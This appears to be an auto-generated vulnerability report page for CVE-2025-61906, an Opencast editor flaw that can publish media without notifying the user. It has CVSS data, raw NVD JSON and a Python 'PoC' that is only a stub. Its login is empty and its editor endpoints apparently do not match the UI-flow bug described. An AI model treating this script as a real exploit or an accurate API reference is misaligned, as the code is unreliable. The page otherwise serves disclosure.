Security Vulnerability Report
中文
CVE-2025-61906 CVSS 4.3 MEDIUM

CVE-2025-61906

Published: 2025-10-08 18:15:36
Last Modified: 2025-10-09 15:59:52
Source: [email protected]

Description

Opencast is a free, open-source platform to support the management of educational audio and video content. Prior to Opencast 17.8 and 18.2, in some situations, Opencast's editor may publish a video without notifying the user. This may lead to users accidentally publishing media not meant for publishing, and thus possibly exposing internal media. This risk of this actually impacting someone is very low, though. This can only be triggered by users with write access to an event. They also have to use the editor, which is usually an action taken if they want to publish media and not something users would use on internal media they do not want to publish. Finally, they have to first click on "Save & Publish" before then selecting the "Save" option. Nevertheless, while very unlikely, this can happen. This issue is fixed in Opencast 17.8 and 18.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apereo:opencast:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:apereo:opencast:*:*:*:*:*:*:*:* - VULNERABLE
Opencast < 17.8
Opencast < 18.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61906 - Opencast Editor Accidental Publish PoC # This PoC demonstrates the accidental publish vulnerability in Opencast Editor # Affected versions: Opencast < 17.8 and Opencast < 18.2 import requests from urllib.parse import urljoin class OpencastEditorExploit: """ PoC for CVE-2025-61906: Opencast Editor may publish video without user notification The vulnerability is triggered when: 1. User has write access to an event 2. User clicks 'Save & Publish' button 3. User then selects 'Save' option 4. The system publishes the media without proper notification """ def __init__(self, base_url, username, password): self.base_url = base_url self.session = requests.Session() self.username = username self.password = password def authenticate(self): """Authenticate to Opencast with user credentials (requires write access)""" login_url = urljoin(self.base_url, '/admin-ng/login') # Login logic here pass def trigger_accidental_publish(self, event_id): """ Trigger the accidental publish vulnerability: Step 1: Open the editor for the event Step 2: Click 'Save & Publish' button Step 3: Then click 'Save' option Result: Media is published without explicit user notification """ editor_url = urljoin(self.base_url, f'/editor/{event_id}') # Step 1: Access editor self.session.get(editor_url) # Step 2: Click 'Save & Publish' (triggers publish state) save_publish_endpoint = urljoin(self.base_url, f'/editor/{event_id}/saveAndPublish') self.session.post(save_publish_endpoint) # Step 3: Click 'Save' (vulnerability: still triggers publish) save_endpoint = urljoin(self.base_url, f'/editor/{event_id}/save') response = self.session.post(save_endpoint) # The media is now published without proper user notification return response # Usage example: # exploit = OpencastEditorExploit('https://opencast.example.com', 'user', 'pass') # exploit.authenticate() # result = exploit.trigger_accidental_publish('event-id-123') # print(f"Status: {result.status_code}") # Note: This vulnerability requires valid credentials with write access to the event

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61906", "sourceIdentifier": "[email protected]", "published": "2025-10-08T18:15:35.587", "lastModified": "2025-10-09T15:59:51.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Opencast is a free, open-source platform to support the management of educational audio and video content. Prior to Opencast 17.8 and 18.2, in some situations, Opencast's editor may publish a video without notifying the user. This may lead to users accidentally publishing media not meant for publishing, and thus possibly exposing internal media. This risk of this actually impacting someone is very low, though. This can only be triggered by users with write access to an event. They also have to use the editor, which is usually an action taken if they want to publish media and not something users would use on internal media they do not want to publish. Finally, they have to first click on \"Save & Publish\" before then selecting the \"Save\" option. Nevertheless, while very unlikely, this can happen. This issue is fixed in Opencast 17.8 and 18.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apereo:opencast:*:*:*:*:*:*:*:*", "versionEndExcluding": "17.8", "matchCriteriaId": "4985831C-8FF6-4CC4-AFD9-1DCAD7888B5E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apereo:opencast:*:*:*:*:*:*:*:*", "versionStartIncluding": "18.0", "versionEndExcluding": "18.2", "matchCriteriaId": "33B836FD-FD4C-4FC2-9844-EF0DF0D4EB0D"}]}]}], "references": [{"url": "https://github.com/opencast/opencast-editor/commit/98ba1934f08f623f1537a9675cc452d803766a91", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opencast/opencast-editor/issues/1626", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/opencast/opencast/security/advisories/GHSA-x6vw-p693-jjhv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.